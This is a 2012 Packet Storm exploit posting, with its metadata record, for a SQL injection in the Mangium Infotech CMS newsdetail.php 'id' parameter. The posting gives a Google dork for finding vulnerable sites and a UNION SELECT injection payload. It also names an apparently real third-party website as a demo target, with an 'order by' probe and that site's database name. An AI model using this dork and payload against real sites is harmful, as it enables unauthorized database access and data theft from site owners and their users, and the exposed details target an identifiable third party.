ID PACKETSTORM:116068
Type packetstorm
Reporter Crim3R
Modified 2012-08-30T00:00:00
Description
`<!--
________ .__ __________________
\_ ___ \_______|__| _____ \_____ \______ \
/ \ \/\_ __ \ |/ \ _(__ <| _/
\ \____| | \/ | Y Y \/ \ | \
\______ /|__| |__|__|_| /______ /____|_ /
\/ \/ \/ \/
-->
# Exploit Title: Mangium Infotech cms Sql Injection Vulnerability
#
# Google Dork: Intext:" Powered by Mangium Infotech"
#
# Date: 08/29/2012
#
# Author: Crim3R
#
# Site : Http://Ajaxtm.com/
#
# Vendor Home : http://www.mangium.com/
#
# Tested on: all
#
==================================
[+] id parametr in newsdetail.php is Vulnerable to sql injection
[+]
target/newsdetail.php?id=[id][+/*!union*/+/*!select*/+1,2,3,4,5,6--]
D3m0:
http://www.trishulblr.com/newsdetail.php?id=7+order+by+7--
DB_NAME : nmittal_tridatabase
===============Crim3R@Att.Net=========
[+] Greetz to All Ajaxtm Security Member
Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal
devilzc0der - Dominator - Hossein.R1369
`
{"sourceHref": "https://packetstormsecurity.com/files/download/116068/mangiuminfotechcms-ql.txt", "sourceData": "`<!-- \n \n________ .__ __________________ \n\\_ ___ \\_______|__| _____ \\_____ \\______ \\ \n/ \\ \\/\\_ __ \\ |/ \\ _(__ <| _/ \n\\ \\____| | \\/ | Y Y \\/ \\ | \\ \n\\______ /|__| |__|__|_| /______ /____|_ / \n\\/ \\/ \\/ \\/ \n \n--> \n# Exploit Title: Mangium Infotech cms Sql Injection Vulnerability \n# \n# Google Dork: Intext:\" Powered by Mangium Infotech\" \n# \n# Date: 08/29/2012 \n# \n# Author: Crim3R \n# \n# Site : Http://Ajaxtm.com/ \n# \n# Vendor Home : http://www.mangium.com/ \n# \n# Tested on: all \n# \n================================== \n[+] id parametr in newsdetail.php is Vulnerable to sql injection \n \n[+] \ntarget/newsdetail.php?id=[id][+/*!union*/+/*!select*/+1,2,3,4,5,6--] \n \nD3m0: \n \nhttp://www.trishulblr.com/newsdetail.php?id=7+order+by+7-- \nDB_NAME : nmittal_tridatabase \n===============Crim3R@Att.Net========= \n \n[+] Greetz to All Ajaxtm Security Member \n \nCair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal \ndevilzc0der - Dominator - Hossein.R1369 \n \n \n \n`\n", "edition": 1, "references": [], "modified": "2012-08-30T00:00:00", "hash": "4bcc4d5f08553df0133e49049c1f8d59cd50aeaa69eabbb7b1e99ec70bd5191e", "cvelist": [], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/116068/Mangium-Infotech-CMS-SQL-Injection.html", "description": "", "id": "PACKETSTORM:116068", "reporter": "Crim3R", "lastseen": "2016-11-03T10:21:39", "published": "2012-08-30T00:00:00", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2016-11-03T10:21:39"}, "vulnersScore": 7.5}, "objectVersion": "1.2", "type": "packetstorm", "cvss": {"vector": "NONE", "score": 0.0}, "title": "Mangium Infotech CMS SQL Injection", "viewCount": 2, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "378379124f93c123350d16e285bab069", "key": "href"}, {"hash": "4528442644496f7faa68c78db7b331f7", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "4528442644496f7faa68c78db7b331f7", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "70db969f88a9b0ac497fcb59806c0942", "key": "reporter"}, {"hash": "e236012be06b6fc4a7596776c7e6553c", "key": "sourceData"}, {"hash": "c3ef5bb3ecbf9dc1d4109b206c269d0a", "key": "sourceHref"}, {"hash": "7b51d1aa7ff08be8a7ab52f8253ba4be", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}]}
{}
